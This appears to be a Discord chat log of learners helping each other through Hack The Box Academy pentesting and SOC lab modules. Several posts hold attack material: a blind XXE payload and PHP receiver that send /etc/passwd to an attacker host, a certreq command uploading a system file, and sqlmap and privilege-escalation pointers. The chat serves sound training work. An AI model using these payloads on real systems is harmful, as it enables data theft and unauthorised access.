#modules
It also helps to follow the "Documentation and reporting" module for best practices
Yes, I'm doing it right now! It wasn't mentioned in the module, but I've seen so many people talking about it in the CPTS talk that I had to check it out
or maybe I wasn't paying enough attention in the module
Check pinned messages
I believe they're pinned in the relevant cert channels
Sysreptor wasn't available at the start, which is likely why it isn't mentioned

¯\_(ツ)_/¯
Hello, I'm a beginner at Hack The Box. Do I ask my task questions here?
which platform are you using, the main one or Academy?
The free version
are you currently doing Starting Point?
you can ask questions related to Starting Point machines in #starting-point
I have no access to it
thanks
Hi, can anyone here help me out with public exploits in the Penetration Tester path? It's part of the Getting Started module.
I'm not really sure where to go after I found the open and filtered ports, since when I run searchsploit on each of the services running, it vomits out tons of exploits or leads me to irrelevant ones.
Look at the open ports, what services are running.
Hey, I am stuck on a problem within the SOC Analyst job path in the Windows Event Logs section. I'm supposed to conduct a similar investigation as in the path, however I don't understand what to do at all. Please help.
OK, so some updates on this: I can only find ssh, rpcbind, and unknown running on the open ports.
I tried searching the number of the ports to find a common exploit somewhere but I couldn't find any.
which section is it of getting started?
It's the Public Exploits section
part of Pentesting Basics
wait
@rustic sage visit the given IP address, and scan the given address.
Look what services are running.
Ohhh OK, so since it's a WordPress plugin I guess I'm supposed to look for a vuln related to that
thanks!
Can somebody help me out with this lab in Shells & Payloads - Reverse Shells? No matter what I do, I can't seem to connect to the target box.
I can't reach the host on either the UDP or TCP VPN, nor can I reach it via Pwnbox.
Even though the host isn't responding to pings, I tried to RDP and I get a connection failed error each time.
Also if there's a tech support-specific channel, please let me know - not trying to clog up #modules if it's unwanted lol
If it's not working even on Pwnbox, reach out to support.
Just in case, make sure you don't have the VPN running on your machine when you try it on a Pwnbox.
I'll give that a shot
Sometimes using the VPN from your machine and using the Pwnbox at the same time will not work.
Indeed, if you connect from two places at once, the sessions will "fight" each other, resulting in each other disconnecting and reconnecting over and over again
(as only one connection per VPN profile is allowed at any one time)
So better to use either the VPN or Pwnbox!
Disconnected, refreshed both the target system and pwnbox - still running into the same issue
I reached out to support though, thanks guys
Sorry, I only saw your message now, do you still need help?
Hi all, I have been going through CPTS and am nearing the end, but in some modules I have so many issues with tools returning false negatives or false positives. I am doing "Attacking Common Applications - Skills Assessment II" and had to look at the solution, only to find the gobuster command provided also gives the wrong results. I am at a bit of a loss as to what to do and there must be others with the same issues. Is there a guide or wiki somewhere with these probably common issues? (I tried switching from UDP to TCP with no joy)
(Using Kali WSL at the moment, but Pwnbox and VMs also have the same issue with false negatives)
https://academy.hackthebox.com/module/80/section/848
Tried brute-forcing usernames with the xato-10-million list, tried creating a user and tampering with the PHPSESSID cookie, but it wasn't encoded in anything.
Not sure what else to try.
The HTB forums show something related to the support element of the target, but the target doesn't have anything like a support page or any support function. The other website buttons do nothing either, except the login and register.
Any suggestions as to what I should try, as I'm stuck on what to do?
Hey... Can someone just tell me if I'm way off in the Skills Assessment of the Injection Attacks Module?
Well, if you don't have credentials, how would you get credentials according to the module?
Figure out the username which is failing.
Try making a user and seeing the requests (saw the profile.php and 2fa.php but can't use it)
Try making a user and modifying the cookie
why is figuring out the username failing
You need password too
Try brute-forcing it
Wordlists exhausted.
Try changing wordlist
Tried all SecLists
you should use the one in the module
Then there would be some mistake in your command
Check your response carefully to use -fr flag in ffuf
he's most likely just not attacking the right thing
yeah but it's so simple
just need to repeat the given payload
Can someone give me some help on the Skills Assessment of the Injection Attacks Module?
explain the problem
where did you get stuck
I guess right in the end... Can't seem to get my XPath query right.... Or they always return true or always false
I may be making some stupid mistake in enumerating the XML schema
did you find the internal web
Yes
then just try to inject q parameter
That's what I'm trying with little success 😅
sections have given you payloads
just try to change it at the start
maybe using a wildcard
I got results, but I may be over my head.... Don't know if the information I'm seeking is inside those nodes.
I'm starting to feel a little confused as to what I am simply learning versus what I am currently meant to be putting into effect. I'm going through the Information Security Foundations path as a complete beginner and I'm having a blast. I'm at the Setting Up module, learning about virtualization and containers. What I'm confused on is whether I am expected to currently install the software described, as it seems to suggest, or if I am simply learning about it. Some of the software requires a Linux OS, which makes it seem like I'm to install it on the digital workstation if I am supposed to install it, but it doesn't seem like I can. Could someone give me a bit of guidance?
Tried it already.... my iframe is too small to accommodate all the information even with increased size
the flag is there
just need to enumerate one by one
change the iframe size
maybe it should be
width="800" height="1600"
Thanks..... Went down a rabbit hole thinking it might be in a node outside of the ones enumerated in the web server file
Had set it to change the iframe size
maybe it should be
width="800" height="700"
will do
Thanks again
height 1600 would be helpful to see result nicely
I kept low due to the visualization breaking when I set to width="1000" height="1000"
You don't have to install everything in the module, but it's good to have a Linux VM for pentesting. Popular choices are Kali/Parrot.
I have set this
It's up to you, if you can see the result.
So should I be using my system for my active learning? (Rather than the digital workstation provided)
Pwnbox is provided, which is a browser-based Parrot VM, but yes, I'd recommend setting up your own.
hey mods, so I'm experiencing a bug in terms of the number of cubes earned through subscription, but I can't find the support chat on the academy page anymore. So where can I disclose this bug now?
You should reach out to support on the site, not here.
Ok thank you! I appreciate your help. I'll focus on setting up my own vm using the softwares suggested in this module
There are also videos online on setting up Kali/Parrot in VirtualBox/VMware if you need more materials.
Sound good, thank you! I'll be back here once I find myself stuck once more haha
maybe you should read what I wrote? There is no support chat on the page anymore so that's why I'm asking here
There is no support on Discord for any purchases made. Contact support via the green box at the bottom right from Academy
If you do not see a green box, disable any adblockers
Still won't do it for me, but thanks for the link which includes an email to the support team 
they will get back to you asap, just know its still very early in the morning 😄
🙏Yes please
Because I am close to breaking my computer, can anyone help me with this problem?
```
└──╼ $eyewitness --web -x web_discovery.xml -d inlanefreight_eyewitness
################################################################################
EyeWitness
################################################################################
Red Siege Information Security - https://www.redsiege.com
################################################################################
Directory Exists! Do you want to overwrite? [y/n] y
Starting Web Requests (8 Hosts)
Message: Expected browser binary location, but unable to find binary in default location, no 'moz:firefoxOptions.binary' capability provided, and no binary flag set on the command line
```
does it accept any argument for binary path?
Hi guys. I just noticed that if I have a meterpreter session and I have SeDebugPrivilege on the user, I can migrate to a winlogon process and get SYSTEM just like that. It's not covered in the modules as far as I know, but is this a common way to abuse SeDebugPrivilege?
this explains it to some extent - https://jlajara.gitlab.io/process-migration
I see an old GitHub issue with the same error. It was about the Docker version, but they say to use the --headless flag.
Otherwise, it seems to be an issue with the Selenium library, if Firefox isn't installed or not in the default location.
Thanks for sharing that.
also a good read is the documentation - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/escalate/getsystem.md#3---token-duplication
eyewitness --web -x web_discovery.xml -d inlanefreight_eyewitness --headless, like this?
I don't even know what --headless does, and it also says it doesn't recognize it.
headless is a web browser without gui
Interesting. If I run getsystem, none of the techniques used are successful, but if I migrate to winlogon it works.
it is covered in Windows Privilege Escalation, although it's abused without Metasploit
Ow... what OS are you running and do you have Firefox installed in a custom location?
I see in eyewitness help that you can specify a log path for selenium:
--selenium-log-path SELENIUM_LOG_PATH Selenium geckodriver log path
It might be useful to check those logs and see where it is trying to fetch your Firefox from.
It might be something simpler, I don't know, I'm just trying to figure it out.
Did you install it with apt?
Thanks.
yes!!
Module: Web Proxies
Section: Skills Assessment - Using Web Proxies
Link: https://academy.hackthebox.com/module/110/section/1055
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
I am attempting to solve this using ZAP since Burp has throttled the request rate in the Community version. I know which encoders I have to use; however, one of the encoders (ASCII Hex) is not an option within ZAP's fuzzer processor. I tried looking for extensions to resolve this in the marketplace but didn't see anything. Is my only option to find a script that encodes or to write one myself? I'm kind of surprised ZAP has the encoder if you right-click the cookie and try to encode/decode but doesn't have it under processors.
Try to see if you get the desired result here: https://gchq.github.io/CyberChef/
I'm pretty sure I'm using the right encoders already, the current issue is adding it to the fuzzer's processor.
Only time I used ZAP was in the module :d
What about for Web scans?
I get that for fuzzing you can probably use ffuf or gobuster or something else.
I used ZAP for its spider module
Oooh, nice.
Same here, I used Burp for that assessment. Maybe Caido if you want faster fuzzing, I haven't checked about the processor though.
We need paid Burp version for that 😦
unfortunately yes
There is a Burp plugin, Turbo Intruder, which is free but less intuitive.
Might try it some day
Can someone help me with the sqlmap module flag 5?
It always returns empty flag or wrong flag.
Maybe the network lag of the VPN might be affecting the decoding.
I think HTB should set shorter flags for SQLi.
```
sqlmap -u "http://94.237.59.193:36836/case5.php?id=1" --risk=3 --level=5 -T flag5 --no-cast --batch --dump --time-sec=10 --flush-session
```
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
I have a question what can I do now
dig hostname
is that true ?
👋 Hi everyone!
In the Command Injections - Advanced Command Obfuscation module (https://academy.hackthebox.com/module/109/section/1039) there is a tip: "If you wanted to bypass a character filter with the above method, you'd have to reverse them as well, or include them when reversing the original command."
My questions are: How can one reverse a single character? And wouldn't including them when reversing the original command still mean that you include a filtered character (thus not having it accepted)?
htb is not an official top-level domain.
Therefore you must specify a name server.
dig hostname @ip_here
How do you talk in #general?
Hi everyone! I am doing the Attacking Common Applications module --> osTicket. I successfully completed the exercise, but the credentials that I used were gathered using dehashed (which requires a paid account for retrieving said credentials). Is there any other way to complete the section without using the provided credentials and gathering them by yourself? Thank you in advance! ❤️
Hello everyone! I'm studying the Crest CPSA/CRT track and wondered if there's any study groups available. Why isn't there a dedicated channel for CREST exams like there is for CPTS CBBH etc.... ? Maybe admins would like to answer.
Because CREST exams are from a different platform.
I understand that, however I feel if you're going to offer a service and we are paying for that service, then go all in and offer a full service, not some half-hearted attempt.
The service does not include Discord channels, nor does it mention that it will; you get study materials and exercises for your money. Not to mention HTB has their own certs.
Fair point, I'm just a little frustrated there isn't a dedicated space where those studying the material can exchange thoughts and ideas.
This channel is for all Academy modules, including the modules in the CREST paths, so feel free to ask or discuss here.
When performing an NTLM relay attack as described in this section https://academy.hackthebox.com/module/116/section/1167, where does impacket-ntlmrelayx.py get the hash? I mean the hash is captured separately using either Responder or impacket-smbserver. In the impacket-ntlmrelayx.py command, we just pass the target, but not the hash. So, how does it know which hash to relay?
They should explain this concept better, this is the 3rd time I'm seeing questions about this specific part this week.
Basically Responder poisons but doesn't capture, and ntlmrelayx is the one capturing/relaying.
Thanks for the explanation.
It doesn't know what to relay, so it will just relay whatever it receives.
You can specify it in the command, but that's out of scope for this.
This means if I don't need to poison, then I can omit starting Responder and simply just use impacket-ntlmrelayx.py, right?
If you don't poison, you would need to find another way to get targets to send an NTLM authentication to you.
Yes. I am actually making SQL server to perform NTLM authentication against the SMB server. So, I don't need responder at all.
does anyone have the cheat sheet for the /bin
yep that's one way to do it
i meant gtfobins
Hey
GTFOBins is the cheat sheet
hello
Question: Why do we need impacket-ntlmrelayx.py to relay the hash? Can't we simply perform Pass-The-Hash?
Because it's NTLMv2, you can't pass it.
Hello Everyone,
I am facing an issue with HTB Academy module machines: "Target is spawning...." and it can't show the IP of the machine.
What should I do? Please guide me.
They should spawn eventually. If not, contact support via the green box
I'm trying to run the enlightenment exploit to get root privileges. How do I actually run it? Do I need to install the exploit on the target machine?
Switch VPN zones and try again
Yes, you need to transfer it to the target. How else do you expect to get priv esc?
How would I transfer it? Install it on my host machine then use netcat?
You can try to capture it and you'll see a long string that is different every time, even if it's from the same user, because it uses a challenge-and-response mechanism to authenticate.
I tried this but still can't resolve it.
Yeah you can use nc
nc means?
Ohh okay 👍
Netcat (nc) is a tool that lets you send and receive data over the network. It uses TCP/IP.
Takeaway: an NTLM hash can be used for Pass-The-Hash but not NTLMv2. Instead, we need to relay the hash in the case of NTLMv2.
correct, or crack it
Thanks 👍 i will try this
Wait, huh? How does nc help the bud who can't spawn a target?
Idk, I replied to another person.
The nc thing is not related to what @slender osprey is doing.
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: AD Enumeration & Attacks - Skills Assessment Part II
I have managed to get a configuration file containing an MSSQL connection string. I captured the hash for the service, but relaying it fails. I do not know what to do next 🤐
check the file carefully
wait which question?
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
The service account doesn't have admin privileges.
So executing commands from the SQL session doesn't allow me to view the file inside the Administrator user directory.
Check for other privileges.
I can see two new privileges:
```
SeImpersonatePrivilege        Impersonate a client after authentication  Enabled
SeCreateGlobalPrivilege       Create global objects                      Enabled
```
yep one of them would do it
This is a technique that isn't taught in the path (yet), in case you're confused.
oh right
In https://academy.hackthebox.com/module/143/section/1275 section, it mentions this. But it says that it will be covered in "Windows PrivEsc" module
Exactly!
yeah just try that
😭
Module File Inclusion / File Inclusion Prevention ............ any hint for the first question? I have tried everything from the previous section.
Oh wait this is modules
Have you googled though?
Yeah, what I found is not it.
You just need to match the version.
Embarrassing 🥲, stupid question here: am I not supposed to find the file inclusion vulnerability first?
I don't think so? The section is about prevention.
The IP page is just showing the Apache2 default page, that's normal, right? Or did something break?
The question after that, I have to do an RCE and edit the php.ini.
I believe you can just place the file in the web dir, since you have SSH access.
Can someone help me with how to save a file on the target machine using netcat?
My bad, those SSH creds, I thought they were for the Pwnbox or something.
I didnt even read !!!
netcat
I'm trying to transfer a file over to the target machine and save it, but my netcat command just runs it.
The creds provided above the questions are always for the module target.
I can't use scp either as I've got no permission.
Managed to figure it out using an HTTP server.
I'm stuck on Dynamic Analysis in module Windows Evasion Techniques, can someone help me?
I repeated all the steps from Academy, but it's not working.
Hello, can someone help me with the module "Attacking Web Apps -> Attacking Splunk" please?
I have downloaded the malicious package from git, modified the IP and port number in run.ps1, and uploaded the app to the application manager. While doing this I have opened a netcat listener on the given port, but nothing happens.
I am trying to exploit SeImpersonatePrivilege using JuicyPotato.exe, but I am getting an error:
I made an exe file with micr0_shell and uploaded it to the victim Windows machine. Static analysis passed, but dynamic didn't.
Try with a lower port number, and if that doesn't work, use a different CLSID.
It worked with PrintSpoofer!
I don't exactly know the details yet. I will look into it when I am on the Privilege Escalation module.
Okay. But what should I do?
Still hung up on the Injection Attacks Skills Assessment.... Can someone help me to whether I'm off and steering even further away 😅 or if I'm on the right track?
As already stated before: If changing the VPN region is not helping, you can either move on and try later, or contact support
Hello, I have a small doubt in Password Attacks, specifically Credential Hunting in Linux. Here in the question I have to find Will's password, and I get the .backup folder where shadow.bak and password.bak are available, but I don't have permissions. Any hint on how I can extract the password?
@uncut ocean You have to look elsewhere, I guess...
I did most of the things. My approach is to grab the shadow and passwd .bak files and unshadow them to grab the hash.
Wrong approach, I guess...
Any hints 😵💫 I've already spent too much time on it.
You have to unshadow, then crack the unshadowed hashes with hashcat.
This is my approach, but the kira user is not in the sudo group and I tried to transfer the file but failed.
As I said... guessing this is the wrong approach... didn't solve it that way...
Try other things...
Like ????
Try...
Bruh!! I did, and here we can use mimipenguin.py and laZagne.py, but they need root privileges.
So try another tool... almost there...
So no one!?
@uncut ocean Try looking for headings ending with "...credentials" in the module --> there should be the answer, I guess.
It’s the IP (+ port) of the DNS server you are querying
so it has nothing to do with ms01?
No
thx gpt...
```
└──╼ $nslookup ms01 172.16.7.3
Server:     172.16.7.3
Address:    172.16.7.3#53

** server can't find ms01: SERVFAIL
```
Guess it was outputting it wrong...
Actually this would have helped me...
Have you managed to solve it? Can I DM you?
It's not a requirement; you can install a DC without it having the DNS role.
In the labs here there should be DNS on the DC though.
Use the FQDN.
@next bronze Good hint... works.
Arigato
Hi. I'm on the labs for the Attacking Common Services module. I enabled the walkthroughs after having done the easy and medium labs to compare my solutions. The medium solution doesn't seem to correspond to the challenge for the medium lab. It has extra steps that I did not need to do.
In fact it felt a bit like the medium lab was the easy lab and the easy lab was the medium lab!
Hi, I couldn't find an obvious answer after performing a search, so I'm asking here. I get the following error when trying to connect to the HTB VPN: sitnl_send: rtnl: generic error (-101): Network is unreachable
I'm using sudo openvpn file.ovpn and I've already tried different VPN locations and both UDP & TCP. Any thoughts on what might be going wrong?
That error looks like you are having network issues.
What does "ip a" show?
Are you sure you are connected to the internet? Guessing so since you're on Discord.
😄
Yes, I'm connected and don't have issues with other services that I can see.
Does it try to set up the tun/tap interfaces?
Can you ping the servers? edge-us-academy-1.hackthebox.eu
That ping is fine
(also the one that's in my ovpn file)
but it looks like it's only the IPv6
that it's complaining about
What's the output of route -n
or netstat -rn
and ip a
but it exits
so obviously not working
is it ok to dump the output of those commands here? not sure about this discord's etiquette 🙂
Reboot, reinstall OpenVPN, download a new VPN file. If all that doesn't work, then best to contact support.
Not sure if this is an oversight in the setup of the challenge.
thank you for looking into it
Can someone just tell me if I'm supposed to brute-force all the IDs in the Injection Attacks Skills Assessment!?
Feel free to DM me your findings and I'll help you.
Apparently you already did but I didn't get a notification yet haha
I have a problem with the lab at the end of Web Attacks - Blind Data Exfiltration. I created the xxe.dtd file as instructed by the course, I sent the request to the right URL containing the body they instructed me to write inside, I opened the PHP server, and I get the response back from the app, but no data is returned. Can anyone help me?
xxe.dtd (local .dtd):
```xml
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://<MY-IP>:8000/?content=%file;'>">
```
Request sent to the web server:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://<MY-IP>:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>
```
Response I get from the web server opened locally on port 8000:
```
10.129.231.75 - - [25/Jul/2024 11:28:23] "GET /xxe.dtd HTTP/1.0" 200 -
```
Damn, the reboot/reinstall did do the trick... 🤷♂️
If you didn't know, you can format code on Discord by using triple backticks -> `. Triple backticks, new line, your code, new line, triple backticks.
If I did know that, I would have done it 🙂
You can also edit your posted messages
The 2nd time I ask something here, and I can say that the Stack Overflow community is nicer compared to this :)))
I am stuck in the Skills Assessment of Information Gathering: Web Edition (the updated one). I am trying to fuzz the vhosts of the provided domain, but using ffuf I am getting every subdomain as status 200 from the wordlist. I am using the /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt wordlist; tried with others, same thing. I don't know why all subdomains are giving status 200 with ffuf.
```
sudo ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://ip:port -H "Host: FUZZ.inlanefreight.htb" -fs 120
```
This is the ffuf command I am using.
So you just made a mean comment towards my post without even considering helping. Nice.
No, it was so I could read it more easily. Your code seems correct.
- Did you try to query /327a6c4304ad5938eaf0efb6cc3e53dc.php directly?
- Did you start a PHP server instead of a Python one?
```php
<?php
// index.php
if (isset($_GET['content'])) {
    error_log("\n\n" . base64_decode($_GET['content']));
}
?>
```
```
php -S 0.0.0.0:8000
```
Sorry, I am little bit frustrated with the labs at the end of each section of the modules.
No problem
I tried to query the file directly:
```xml
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/327a6c4304ad5938eaf0efb6cc3e53dc.php">
```
And with the PHP server opened as you mentioned, I get this:
```
[Thu Jul 25 11:23:46 2024] 10.129.231.75:37150 Accepted
[Thu Jul 25 11:23:46 2024] 10.129.231.75:37150 [200]: GET /xxe.dtd
[Thu Jul 25 11:23:46 2024] 10.129.231.75:37150 Closing
```
But nothing returned...
I also tried not using the .php file to decode the content and just receiving the content base64-encoded, and still nothing.
It suddenly started to work...
Nice 
Man, these labs are very bad...
The information is very good, but the machines that I have to exploit always have problems, and I spend 2-4 hours troubleshooting...
Is there any link where we can send feedback?
You can use /feedback
Here, or is there a special channel?
Here
Maybe try to switch to the closest vpn marked as "Low Load"?
I am doing the paths on a business account. I think these accounts have priority or something, idk.
But it is a general problem with the machines and labs. I read this on multiple forums, including the threads opened on the HTB forum...
When going through the pentesting modules, did you guys use Pwnbox or your own VM? I prefer my own but it's so clunky.
I tried both and it's the same..
why would your own vm be clunky
I don't have the best PC. I dedicated the right amount of RAM to the VM, it's just super slow.
and CPUs
Kali will run fine on 4 vCores and 4 GB of RAM.
I did that and there's delayed typing, it takes forever to pull up Firefox and other apps, etc.
No background processes running either.
I had the same issue with the keyboard delay; I sorted it by checking "Virtualize IOMMU".
Sweet, thank you.
Just the option wasn't available when I used a Kali VMware image; I had to install from ISO to get the boxes ungrayed.
That's an Intel-only thing, I think.
Ah yeah, you're right, I just checked the VMware doc. Does the keyboard delay issue happen on AMD as well? It doesn't seem to be a widespread problem though; it doesn't happen with a Windows VM, for instance.
Please can someone help me with "Attacking common applications -> Attacking Splunk" ? I think that I've followed the instructions, but I don't get the reverse shell.
Sup, yes finished the module, send me a friend request
I've generally not had many issues with VM performance, so I can't say. I've used a good number of PCs/laptops with chips from both companies and they're both fine.
There were some problems with VMware on the big.LITTLE architecture, but it's mostly fine now.
I'm on the Attacking Web Applications with Ffuf module and just passed the vhost fuzzing section. And it brought up a question in my mind, is there a way to discover a sub-domain that's not public and associated with a different IP address from the one we know?
For example: Let's say we're given the domain example.com and it's IP address is 192.168.0.10. If there was a sub-domain private.example.com that wasn't listed in any public DNS-record and associated with a different IP address, would it be possible to find it? If so, how?
Is there a best channel to request OpenVPN assistance? I'm having trouble connecting to HTB
Hey Jeff, there are a few steps in this attack; it is kind of hard to say just like that why you do not get a reverse shell.
Can I talk to you directly? I've been waiting 3 hours for a reply, like a bottle in the sea 🙂
If there's a DNS server that can resolve this, you can just pull it from the DNS server there.
If there are no DNS records anywhere, would anyone know that's where that subdomain would point to in the first place?
I don't know if I can help much more than the details in the course material. I checked my notes and there is nothing more than the course process, so I guess if you follow the course you'll get a shell back. Maybe you missed one step somewhere?
All I got beyond the course is this, and it will not help here:
Note: restart the Splunk service on Unix-type machines for this to work. No restart is needed on Windows machines.
But let's say there isn't a DNS server that can resolve private.example.com and even the hosts file doesn't have an entry, then it's impossible, right?
So it is impossible to discover it if there's no DNS record anywhere and it's associated with a different IP address?
But nmap says that Splunk runs on a Windows machine.
In that case, if it's not associated at all, you might as well treat private.example.com as a separate website.
Alrighty, thanks!
Haha yeah, that's why I said it will not help here, sorry for confusing you. I just shared what I got.
Anyone, any help? I believe the server is set to respond with a default page, therefore I am getting a response for every vhost; even starwars.inlanefreight.htb gave me 200 🤣
I searched on Discord and "many" people have had the same problem. We don't know if they have solved it or not.
Follow the section to the T and you'll get it.
I don't remember much, but that's what I did for that part.
You can filter out the size that you don't want.
Every response is size 120, so if I filter I get none.
That's why I am stuck, I can't find any valid subdomains.
wait for it to finish
in your run.ps1 file, did you use port 443 like in the course material? No typo in the IP? did you remove comments etc
Absolutely
yes I did wait for ffuf to complete its fuzzing with filter and I got none
are you fuzzing using the domain name instead of ip and port?
As said before, it should work if you follow the course. Or there is another issue we aren't able to see from here.
I can't spin up a target right now to test it but i might give it a go later.
maybe useless but i would try to refresh the vpn, respawn a target and start from scratch.
I've restarted from scratch 3 times, and I can't see my mistake. If you can check on your end, it would be great.
Module: Attacking Web Applications with Ffuf
Section: Parameter Fuzzing - POST
Link: https://academy.hackthebox.com/module/54/section/508
Is there a resource to check which content type to use when fuzzing POST requests? For example, with PHP, the POST request can only accept content type application/x-www-form-urlencoded.
yes, and after checking some more I can access http://inlanefreight.htb:54495 in my browser, but when I try to curl it (curl http://inlanefreight.htb:54495) I get a failed connection error
so it is becoming more confusing for me now
well after resetting curl works fine but even now I can't fuzz properly
still getting all hosts with status 200 and response size 120
just tried it and it worked for me
Isn't the answer to this: How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
ss -lH | wc -l? Or am I misreading the question?
ok, I misunderstood "not on localhost and IPv4 only"; English issue I guess 😄
i understood it as !(localhost & ipv4 only) whereas it was meant as !ipv6 !localhost
man why me🥲
are you getting valid vhosts?
yep
I've got the same problem with ffuf but gobuster works fine, I really don't know why that is
you can try to run them both via burpsuite and see what their output actually is
Anyone know anything about this?
can someone help me in the WordPress hacking module, section Directory Indexing. I have tried looking in wp-includes and wp-content but can't find the flag.txt anywhere. I have also tried using ffuf even though it says do it manually, because I just can't find anything
bruh i have student sub and i went for plat monthly and i just got it to unlock 2 modules but now i have to re get student sub and pay money again for it to access the rest of the cpts modules i wanted ;-;
just blindly followed the module...
Do you have a few minutes to open my eyes ?
ok i can try
privately ?
ok go DM
Module: Windows Privilege Escalation
Chapter: Interacting with Users
For the exercise, I need(ed) to see that our user has write privileges over a specific subfolder, but
smbmap -u htb-student -p '[...]' -H $TARGET -r 'Department Shares' --depth 10 doesn't list the write access of the subfolder
Question: how can I reliably recursively list the rights of files in a share from linux?
can someone pls help me?
you mean i should use proxychains configured to send traffic through a burp proxy? if it is so, I don't know why it doesn't work either 🙁
Yes, that's what I did, but for some reason the subfolder rights are listed as read-only, while here one of the folders also has write rights. Maybe it's due to the SMB connection or the version of smbmap, idk
Spoiler: the subfolder with write rights is ||IT|| but it's displayed like the other subfolders
Are you using the right user account (the one with the write privilege) to connect to the share? (I haven't done this module yet)
Hey, I have a question regarding the SOC analyst path. I am on a module where we are reading Windows Event and Sysmon logs, and it is asking me to do this: "By following the required steps, which involve renaming reflective_dll.x64.dll to WININET.dll, moving calc.exe from C:\Windows\System32 along with WININET.dll to a writable directory (such as the Desktop folder), and executing calc.exe, we achieve success. Instead of the Calculator application, a MessageBox is displayed." I already moved calc.exe to the desktop; however, I do not have the file reflective_dll.x64 in my pwnbox when I RDP into the target IP. The only thing there is a GitHub link to a repository that has that file name, but I have no internet access when I RDP into the target IP, so I have no idea how I am supposed to get this file.
I ran the command dir /s filename.dll and it is not in the vm and I was in the admin directory when I searched
Please help, idk what I am supposed to do, I'm ngl
I have to admit this one took me a while. Now I realize I need to go study assembly language, shellcode and C in a lot more detail if I want to be even half decent
for me gobuster is also not working
Yes I created a file in the subfolder with smbclient and the same credentials
pls someone help me
Feel free to dm me
thx u
@gleaming thistle what error did you receive when you inputted dir /s filename.dll
File not found, I used ChatGPT and realized it was because I was in the wrong directory. I was under the impression that the higher you are in the directory list the further you can search so I was in the admin directory doing /s to find the file but I should have been in tools directory and used /s there to find the file
Why? Lol
Ahhh ok I see what happened. Yeah if you want to execute most of the programs you have to be in the corresponding directories. Especially when you start getting into psget or SilkETW
Or specify full filepath
Yup that too! Windows is fun like that -_-
why what?
What modules did you need to unlock?
they were the t3 AD modules
Those are unnecessary for cpts
i unlocked them, then found out i have to re subscribe back to my student & pay more
yea additional learning
Well yeah, you can't have 2 active subs
yea found that out
That's kinda common sense
idk yea if you think about it like that
It should also have given you the "upgrade/downgrade to" message
yea, I thought I could get those cubes and pay that amount for that sub and I would still have my student sub, cuz the month didn't end and I have my student email in my account
Also prob smarter to do the extra stuff at the end of the path
cool 👍
Depends, monthly subs aren't from the first to last of month. They are roughly based on sub date
I.e. if you subbed on the 15th, it rolls over every 15th
yep, and it's recurring, so I would be constantly in my monthly sub. I didn't think it would just cut it off right there as soon as I upgraded, and now I have to pay more for the rest of the month that I had remaining
Well thank you!
When you upgrade/downgrade sub it's immediately afaik
yes, a monthly subscription is immediate, so I wanted to upgrade immediately to Plat monthly and get the cubes, and I hoped I would still have my student sub for the remainder of the month and it wouldn't cut it off since I already paid for the month
If you need anymore help don't hesitate to ask. I'm on the same mini module as you are lol
nevermind though
Thank you! I mean its just getting stumped over and over again each question takes me forever to try and figure out lol
I get it lol. There is no rushing on these modules. I ran into my fair share of bumps for this module and I'm sure there will be plenty more lol
no, you can just directly use the ffuf and gobuster flags for proxying; check the help, I don't have them in my head at the moment. No need for proxychains
message support or submit /feedback ¯_(ツ)_/¯
Or both
Genuinely, stop using chatGPT; take notes; and apply your brain more. Also if you're struggling with the soc analyst path, do the soc analyst pre-requisite path
Its just a little hard to follow what they want me to do, which I fully understand it is so that I can actually learn. Its just a little difficult to follow
Then take notes
ChatGPT can often be wrong when trying to figure certain things out
It's not a search engine, it's an LLM and guesses what to say next
I dont use chatgpt to anwser the question for me I use it when for example I would say "Hey what is the command to look do whatever"
To do whatever*
Yeah even commands can be hit/or miss
But no i fully understand
And it can even overcomplicate it
Speaking of helping though, Im stuck again
Tip when you're stuck. Walk back through slowly
Don't just rush for help whenever you hit a bump
you should maybe just learn to prompt GPT better. There are techniques to get better results; it is not just about throwing questions at it.
If you're meant to get a reverse shell, for instance, did you skip over where it said to set up your listener
Also; https://dontasktoask.com
I'm having trouble with the living off the land section of File Transfers, because I get access to the target Windows box but then I can't use certutil, because it won't accept the -Post parameter. I can't download the latest version of certutil onto the Windows box because there's no internet for the Windows target.
Is this on purpose and what do you propose I do?
You don't need the latest version
well, but the -Post parameter won't work
But also I don't recall being able to -Post with certutil
Guys, the issue isn't whether I'm using GPT or whether I'm taking notes or whether I'm rushing. The issue is that it is hard to follow. For example, right now it's saying to do this: "To showcase unmanaged PowerShell injection, we can inject an unmanaged PowerShell-like DLL into a random process, such as spoolsv.exe. We can do that by utilizing the PSInject project in the following manner." and then it shows me some code. The code isn't run in PowerShell or cmd, and I know the purpose is to make spoolsv go from an unmanaged state to a managed state in Hack Processor.
Im not asking for help though*
Here's what the section says to do with certreq:
Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)
Follow along with the module
big thanks 😀
sorry I meant certreq not certutil
timed out
O.o
I know but it still says to do it in section
Yeah, like what @fathom pendant said, you should take your time reading through it. You are going to be utilizing cmd or PowerShell a lot in this module
yeah, some phrasing might be hard to follow, and those CDSA modules can be quite steep if you do not have broad enough fundamental knowledge.
I had to go through it a few times one step at a time to see what it was doing and how it affected it
can someone help me with this section? I'm not getting something about the section, because it's telling me to use certreq, but the only certreq command on the entire page results in an error
File Inclusion - skills assessment: I got to read /etc/passwd, but I'm struggling at the RCE part... any hint?
Well /et/passwd doesn't exist
Do you need RCE?
I tried changing syntax and got this:
C:\Users\htb-student>certreq.exe -Submit -config http://10.129.170.187:8000/ c:\windows\win.ini
